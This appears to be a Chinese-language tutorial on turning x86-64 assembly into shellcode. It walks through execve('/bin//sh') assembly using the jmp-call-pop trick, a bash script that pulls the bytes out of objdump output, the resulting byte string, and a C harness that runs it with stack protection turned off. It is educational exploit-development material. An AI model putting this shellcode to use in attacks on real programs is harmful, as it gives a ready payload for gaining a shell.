转换汇编到shellcode的过程

汇编代码如下:

section .text
    global _start
_start:
    jmp shell
here:
    xor rax,rax
    pop rdi
    xor rsi,rsi
    xor rdx,rdx
    add rax,59
    syscall
shell:
    call here
bash db "/bin//sh"

编译执行过程如下：

jay@ubuntu:~/Desktop/bin2shell$ vim shell.asm
jay@ubuntu:~/Desktop/bin2shell$ nasm -f elf64 shell.asm -o shell.o
jay@ubuntu:~/Desktop/bin2shell$ ld shell.o -o shell 
jay@ubuntu:~/Desktop/bin2shell$ ./shell 
$ ls
README.md  bin2shell.sh  shell  shell.asm  shell.o
$ exit

用如下bin2shell.sh 脚本将二进制的shell程序 转为x86_64位的shellcode

#!/bin/bash
for i in $(objdump -d $1 |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

原理：objdump -d后取带数字的每行的第二个字段 并在其前加入 “\x“ 之后echo输出

jay@ubuntu:~/Desktop/bin2shell$ objdump -d shell

shell:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:   eb 10                   jmp    400092 <shell>

0000000000400082 <here>:
  400082:   48 31 c0                xor    %rax,%rax
  400085:   5f                      pop    %rdi
  400086:   48 31 f6                xor    %rsi,%rsi
  400089:   48 31 d2                xor    %rdx,%rdx
  40008c:   48 83 c0 3b             add    $0x3b,%rax
  400090:   0f 05                   syscall 

0000000000400092 <shell>:
  400092:   e8 eb ff ff ff          callq  400082 <here>

0000000000400097 <bash>:
  400097:   2f                      (bad)  
  400098:   62                      (bad)  
  400099:   69                      .byte 0x69
  40009a:   6e                      outsb  %ds:(%rsi),(%dx)
  40009b:   2f                      (bad)  
  40009c:   2f                      (bad)  
  40009d:   73 68                   jae    400107 <bash+0x70>

最后效果如下：

jay@ubuntu:~/Desktop/bin2shell$ ./bin2shell.sh  shell 
\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68

最后利用shellcode的c代码如下：

# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing


#include<stdio.h>
#include<string.h>

unsigned char code[] = "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";

main()
{

printf("Shellcode Length:  %d\n", (int)strlen(code));

int (*ret)() = (int(*)())code;//声明一个函数指针  将code数组的地址转换同一类型的指针并赋值

ret();

}

代码：https://github.com/tangsilian/SomeCode/tree/master/bin2shellcode

参考：
https://www.exploit-db.com/exploits/42791/
cut 命令解释：https://www.ibm.com/support/knowledgecenter/zh/ssw_aix_72/com.ibm.aix.cmds1/cut.htm